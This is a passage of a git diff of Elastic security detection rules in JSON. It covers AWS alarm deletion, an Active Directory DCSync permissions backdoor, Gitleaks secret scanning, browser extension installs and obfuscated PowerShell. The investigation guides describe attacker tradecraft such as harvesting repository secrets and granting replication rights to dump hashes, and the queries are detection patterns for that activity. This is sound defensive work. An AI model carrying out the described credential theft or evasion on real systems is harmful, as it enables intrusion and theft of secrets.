"f6d8c743-0916-4483-8333-3c6f107e0caa", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 6 + }, + "id": "f6d8c743-0916-4483-8333-3c6f107e0caa_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_209.json b/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_209.json deleted file mode 100644 index 93f2d5c7fee..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/f772ec8a-e182-483c-91d2-72058f76a44c_209.json +++ /dev/null @@ -1,95 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the deletion of an AWS CloudWatch alarm. An adversary may delete alarms in an attempt to evade defenses.", - "false_positives": [ - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Alarm deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-60m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS CloudWatch Alarm Deletion", - "note": "## Triage and analysis\n\n### Investigating AWS CloudWatch Alarm Deletion\n\nAmazon CloudWatch is a monitoring and observability service that collects monitoring and operational data in the form of\nlogs, metrics, and events for resources and applications. This data can be used to detect anomalous behavior in your environments, set alarms, visualize\nlogs and metrics side by side, take automated actions, troubleshoot issues, and discover insights to keep your\napplications running smoothly.\n\nCloudWatch Alarms is a feature that allows you to watch CloudWatch metrics and to receive notifications when the metrics\nfall outside of the levels (high or low thresholds) that you configure.\n\nThis rule looks for the deletion of a alarm using the API `DeleteAlarms` action. Attackers can do this to cover their\ntracks and evade security defenses.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if there is a justification for this behavior.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "event.dataset:aws.cloudtrail and event.provider:monitoring.amazonaws.com and event.action:DeleteAlarms and event.outcome:success\n", - "references": [ - "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudwatch/delete-alarms.html", - "https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_DeleteAlarms.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "f772ec8a-e182-483c-91d2-72058f76a44c", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Resources: Investigation Guide", - "Tactic: Defense Evasion" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 209 - }, - "id": "f772ec8a-e182-483c-91d2-72058f76a44c_209", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f8822053-a5d2-46db-8c96-d460b12c36ac_106.json b/packages/security_detection_engine/kibana/security_rule/f8822053-a5d2-46db-8c96-d460b12c36ac_106.json deleted file mode 100644 index d269493ef2b..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/f8822053-a5d2-46db-8c96-d460b12c36ac_106.json +++ /dev/null @@ -1,97 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the modification of the nTSecurityDescriptor attribute in a domain object with rights related to DCSync to a user/computer account. Attackers can use this backdoor to re-obtain access to hashes of any user/computer.", - "from": "now-9m", - "index": [ - "winlogbeat-*", - "logs-system.security*", - "logs-windows.forwarded*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Potential Active Directory Replication Account Backdoor", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Active Directory Replication Account Backdoor\n\nActive Directory (AD) is a critical component in many enterprise environments, managing user and computer accounts. Adversaries may exploit AD by modifying security descriptors to gain replication rights, allowing them to extract sensitive credential data. The detection rule identifies suspicious changes to security descriptors, specifically targeting attributes that grant replication capabilities, which could indicate an attempt to establish a backdoor for credential access.\n\n### Possible investigation steps\n\n- Review the event logs for the specific event code 5136 to identify the exact changes made to the nTSecurityDescriptor attribute and the account involved.\n- Examine the winlog.event_data.AttributeValue to determine if the changes include the specific GUIDs (*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2, *1131f6aa-9c07-11d1-f79f-00c04fc2dcd2, *89e95b76-444d-4c62-991a-0facbeda640c) that indicate replication rights were granted.\n- Identify the user or computer account (S-1-5-21-*) that was granted these rights and assess whether this account should have such permissions.\n- Check the account's recent activity and login history to identify any unusual or unauthorized access patterns.\n- Investigate any recent changes or anomalies in the directory service that could correlate with the suspicious modification event.\n- Consult with the Active Directory administrators to verify if the changes were authorized and part of any legitimate administrative tasks.\n\n### False positive analysis\n\n- Changes made by authorized administrators during legitimate security audits or system maintenance can trigger the rule. To manage this, create exceptions for known administrative accounts performing regular audits.\n- Automated scripts or tools used for Active Directory management might modify security descriptors as part of their normal operation. Identify these scripts and exclude their associated accounts from triggering alerts.\n- Scheduled tasks or system processes that require replication rights for synchronization purposes may also cause false positives. Review and whitelist these processes if they are verified as non-threatening.\n- Third-party applications with legitimate replication needs might alter security descriptors. Ensure these applications are documented and their actions are excluded from the rule.\n- Temporary changes during system migrations or upgrades can be mistaken for suspicious activity. Monitor these events closely and apply temporary exceptions as needed.\n\n### Response and remediation\n\n- Immediately isolate the affected user or computer account from the network to prevent further unauthorized access or data exfiltration.\n- Revoke any unauthorized permissions or changes made to the nTSecurityDescriptor attribute for the affected account to remove replication rights.\n- Conduct a thorough review of recent changes to the AD environment, focusing on accounts with elevated privileges, to identify any other unauthorized modifications.\n- Reset passwords for all accounts that may have been compromised, prioritizing those with administrative or sensitive access.\n- Implement additional monitoring on the affected account and related systems to detect any further suspicious activity.\n- Escalate the incident to the security operations center (SOC) or incident response team for a comprehensive investigation and to determine the full scope of the breach.\n- Review and update access control policies and security descriptors in Active Directory to prevent similar unauthorized changes in the future.", - "query": "event.code:\"5136\" and\n winlog.event_data.AttributeLDAPDisplayName:\"nTSecurityDescriptor\" and\n winlog.event_data.AttributeValue : (\n (\n *1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-* and\n *1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-* and\n *89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-*\n )\n )\n", - "references": [ - "https://twitter.com/menasec1/status/1111556090137903104", - "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", - "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml", - "https://learn.microsoft.com/en-us/windows/win32/adschema/r-ds-replication-get-changes-all", - "https://learn.microsoft.com/en-us/windows/win32/adschema/r-ds-replication-get-changes", - "https://learn.microsoft.com/en-us/windows/win32/adschema/r-ds-replication-get-changes-in-filtered-set" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.AttributeLDAPDisplayName", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.AttributeValue", - "type": "unknown" - } - ], - "risk_score": 47, - "rule_id": "f8822053-a5d2-46db-8c96-d460b12c36ac", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: Active Directory", - "Use Case: Active Directory Monitoring", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1003", - "name": "OS Credential Dumping", - "reference": "https://attack.mitre.org/techniques/T1003/", - "subtechnique": [ - { - "id": "T1003.006", - "name": "DCSync", - "reference": "https://attack.mitre.org/techniques/T1003/006/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 106 - }, - "id": "f8822053-a5d2-46db-8c96-d460b12c36ac_106", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f92171ed-a4d3-4baa-98f9-4df1652cb11b_1.json b/packages/security_detection_engine/kibana/security_rule/f92171ed-a4d3-4baa-98f9-4df1652cb11b_1.json new file mode 100644 index 00000000000..65b24716d9c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f92171ed-a4d3-4baa-98f9-4df1652cb11b_1.json @@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects the execution of Gitleaks, a tool used to search for high-entropy strings and secrets in code repositories, which may indicate an attempt to access credentials.", + "false_positives": [ + "Gitleaks is a legitimate open-source tool used by security professionals and developers to search for sensitive information, such as passwords, API keys, and other secrets, within code repositories. It is commonly employed during security assessments and code reviews to identify potential vulnerabilities." + ], + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.forwarded*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Secret Scanning via Gitleaks", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential Secret Scanning via Gitleaks\n\nThis alert fires when a host launches Gitleaks, a secret-scanning utility that hunts high-entropy strings and credentials in source code and repositories, signaling potential credential harvesting. An attacker may clone internal repos or traverse local workspace directories, drop a portable gitleaks binary in /tmp or %TEMP%, run recursive scans with wide rule sets and JSON output, then archive the results to exfiltrate tokens, API keys, and passwords for lateral movement and service impersonation.\n\n### Possible investigation steps\n\n- Review the full command line to identify --path/--repo/--report/--format flags, which reveal scope and whether results are being written for exfiltration.\n- Examine parent and ancestry plus user session to determine if it was launched by CI/dev tooling versus an interactive shell, and note execution from temp or unusual directories suggesting a dropped portable binary.\n- Locate and inspect newly created artifacts (gitleaks.json, .sarif, .csv, zip archives) near the event time, confirm the presence of secrets, and map their sensitivity to affected systems.\n- Correlate with network and data movement around the event for clones to internal repos and outbound transfers to cloud storage, paste sites, or email, and capture repository URLs or destinations if present.\n- Trace how the binary arrived by checking recent downloads and file writes (curl/wget, package managers, GitHub releases), verify the binary\u2019s hash and signer, and compare against known-good sources.\n\n### False positive analysis\n\n- A developer or security team member intentionally runs gitleaks to audit internal code for secrets during routine hygiene, producing local report artifacts and showing normal parent processes without exfiltration behavior.\n- A user invokes gitleaks with --version or --help to validate installation or review usage, which generates a process start event but performs no scanning or credential access.\n\n### Response and remediation\n\n- If the run was unauthorized or executed from /tmp, %TEMP%, or a user profile, terminate gitleaks.exe/gitleaks, isolate the host from the network, and capture the binary path and hash for forensics.\n- Quarantine report artifacts produced by the run (gitleaks.json, .sarif, .csv, and any zip archives) by securing copies for evidence, removing world-readable permissions, and deleting residual copies from the working directory, Downloads, repo folders, and CI workspaces after collection.\n- Eradicate tooling by removing the dropped gitleaks binary and any wrapper scripts or CI job steps that invoke it, and enforce execution blocking for gitleaks in user-writable paths via application control or EDR policy.\n- Immediately revoke and rotate any secrets confirmed in the reports or repository (cloud API keys, service tokens, SSH keys, credentials), purge them from repo history (git filter-repo/BFG) if present, redeploy updated secrets from the vault, and force password resets for affected accounts.\n- Review git activity and data movement around the event for repo clones and exports, and inspect outbound transfers of report files to cloud storage, paste sites, or email; escalate to Incident Response and Legal if any report left the device or if production/customer credentials are exposed.\n- Harden going forward by enabling approved server-side and CI secret scanning, enforcing pre-commit hooks, prohibiting PATs with broad scopes, restricting egress to paste/file-sharing sites, and blocking execution of portable binaries from temp and user-writable locations.", + "query": "process where event.type == \"start\" and event.action like (\"exec\", \"exec_event\", \"start\", \"ProcessRollup2\", \"executed\", \"process_started\", \"Process Create*\") and\nprocess.name : (\"gitleaks.exe\", \"gitleaks\")\n", + "references": [ + "https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise", + "https://socket.dev/blog/shai-hulud-strikes-again-v2" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.9.0" + }, + { + "package": "crowdstrike", + "version": "^2.0.0" + }, + { + "package": "auditd_manager", + "version": "^1.18.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f92171ed-a4d3-4baa-98f9-4df1652cb11b", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Data Source: Auditd Manager", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "f92171ed-a4d3-4baa-98f9-4df1652cb11b_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f97504ac-1053-498f-aeaa-c6d01e76b379_207.json b/packages/security_detection_engine/kibana/security_rule/f97504ac-1053-498f-aeaa-c6d01e76b379_207.json new file mode 100644 index 00000000000..cd2d046aa76 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f97504ac-1053-498f-aeaa-c6d01e76b379_207.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the install of browser extensions. Malicious browser extensions can be installed via app store downloads masquerading as legitimate extensions, social engineering, or by an adversary that has already compromised a system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Browser Extension Install", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Browser Extension Install\nBrowser extensions enhance functionality in web browsers but can be exploited by adversaries to gain persistence or execute malicious activities. Attackers may disguise harmful extensions as legitimate or use compromised systems to install them. The detection rule identifies suspicious extension installations by monitoring file creation events in typical extension directories, filtering out known safe processes, and focusing on Windows environments.\n\n### Possible investigation steps\n\n- Review the file creation event details to identify the specific browser extension file (e.g., .xpi or .crx) and its path to determine if it aligns with known malicious patterns or locations.\n- Check the process that initiated the file creation event, especially if it is not a known safe process like firefox.exe, to assess if it is a legitimate application or potentially malicious.\n- Investigate the user account associated with the file creation event to determine if the activity is expected or if the account may have been compromised.\n- Examine recent system activity and logs for any signs of social engineering attempts or unauthorized access that could have led to the installation of the extension.\n- Cross-reference the extension file name and path with threat intelligence sources to identify if it is associated with known malicious browser extensions.\n- If applicable, review the browser's extension management interface to verify the presence and legitimacy of the installed extension.\n\n### False positive analysis\n\n- Language pack installations for Firefox can trigger false positives. Exclude files named \"langpack-*@firefox.mozilla.org.xpi\" from detection to prevent unnecessary alerts.\n- Dictionary add-ons for Firefox may also be flagged. Add exceptions for files named \"*@dictionaries.addons.mozilla.org.xpi\" to reduce false positives.\n- Regular updates or installations of legitimate browser extensions from trusted sources can be mistaken for malicious activity. Maintain a list of trusted processes and paths to exclude from monitoring.\n- User-initiated installations from official browser stores might be flagged. Educate users on safe installation practices and consider excluding known safe processes like \"firefox.exe\" when associated with legitimate extension paths.\n- Frequent installations in enterprise environments due to software deployment tools can cause alerts. Coordinate with IT to identify and exclude these routine activities from detection.\n\n### Response and remediation\n\n- Isolate the affected system from the network to prevent further spread or communication with potential command and control servers.\n- Terminate any suspicious processes associated with the unauthorized browser extension installation, such as unknown or unexpected instances of browser processes.\n- Remove the malicious browser extension by deleting the associated files from the extension directories identified in the alert.\n- Conduct a full antivirus and anti-malware scan on the affected system to identify and remove any additional threats or remnants of the malicious extension.\n- Review and reset browser settings to default to ensure no residual configurations or settings are left by the malicious extension.\n- Escalate the incident to the security operations team for further investigation and to determine if additional systems are affected.\n- Implement application whitelisting to prevent unauthorized browser extensions from being installed in the future, focusing on the directories and file types identified in the detection query.", + "query": "file where host.os.type == \"windows\" and event.type : \"creation\" and\n(\n /* Firefox-Based Browsers */\n (\n file.name : \"*.xpi\" and\n file.path : \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\*\\\\Profiles\\\\*\\\\Extensions\\\\*.xpi\" and\n not\n (\n process.name : \"firefox.exe\" and\n file.name : (\n \"langpack-*@firefox.mozilla.org.xpi\",\n \"*@dictionaries.addons.mozilla.org.xpi\",\n \"newtab@mozilla.org.xpi\",\n \"uBlock0@raymondhill.net.xpi\",\n /* AdBlockPlus */\n \"{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi\",\n /* Bitwarden */\n \"{446900e4-71c2-419f-a6a7-df9c091e268b}.xpi\",\n \"addon@darkreader.org.xpi\",\n /* 1Password */\n \"{d634138d-c276-4fc8-924b-40a0ea21d284}.xpi\",\n \"support@lastpass.com.xpi\",\n /* Grammarly */\n \"87677a2c52b84ad3a151a4a72f5bd3c4@jetpack.xpi\",\n \"sentinelone_visibility@sentinelone.com.xpi\",\n \"keepassxc-browser@keepassxc.org.xpi\"\n )\n )\n ) or\n /* Chromium-Based Browsers */\n (\n file.name : \"*.crx\" and\n file.path : \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\*\\\\*\\\\User Data\\\\Webstore Downloads\\\\*\"\n )\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.9.0" + }, + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "f97504ac-1053-498f-aeaa-c6d01e76b379", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: SentinelOne", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1176", + "name": "Software Extensions", + "reference": "https://attack.mitre.org/techniques/T1176/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 207 + }, + "id": "f97504ac-1053-498f-aeaa-c6d01e76b379_207", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f9753455-8d55-4ad8-b70a-e07b6f18deea_5.json b/packages/security_detection_engine/kibana/security_rule/f9753455-8d55-4ad8-b70a-e07b6f18deea_5.json new file mode 100644 index 00000000000..4602cb1080b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f9753455-8d55-4ad8-b70a-e07b6f18deea_5.json @@ -0,0 +1,183 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies PowerShell scripts with an abnormally high proportion of non-alphanumeric characters, often resulting from encoding, string mangling, or dynamic code generation.", + "from": "now-9m", + "language": "esql", + "license": "Elastic License v2", + "name": "Potential PowerShell Obfuscation via High Special Character Proportion", + "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 1000\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n// Excludes spaces, #, = and - as they are heavily used in scripts for formatting\n| eval Esql.script_block_tmp = replace(powershell.file.script_block_text, \"\"\"[^0-9A-Za-z\\s#=-]\"\"\", \"\ud83d\udd25\")\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = Esql.script_block_length - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// Calculate the ratio of special characters to total length\n| eval Esql.script_block_ratio = Esql.script_block_pattern_count::double / Esql.script_block_length::double\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_length,\n Esql.script_block_ratio,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n file.directory,\n powershell.sequence,\n powershell.total,\n _id,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts with high special character ratio\n| where Esql.script_block_ratio > 0.30\n\n// Exclude Noisy Patterns\n| where not file.directory like \"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows Defender Advanced Threat Protection\\\\\\\\DataCollection\\\\\\\\*\"\n // ESQL requires this condition, otherwise it only returns matches where file.directory exists.\n or file.directory IS NULL\n", + "related_integrations": [ + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.script_block_length", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_pattern_count", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_ratio", + "type": "double" + }, + { + "ecs": false, + "name": "Esql.script_block_tmp", + "type": "keyword" + }, + { + "ecs": false, + "name": "_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "_index", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_entropy_bits", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_hash", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_length", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.file.script_block_surprisal_stdev", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "text" + }, + { + "ecs": false, + "name": "powershell.file.script_block_unique_symbols", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.sequence", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.total", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "f9753455-8d55-4ad8-b70a-e07b6f18deea", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files 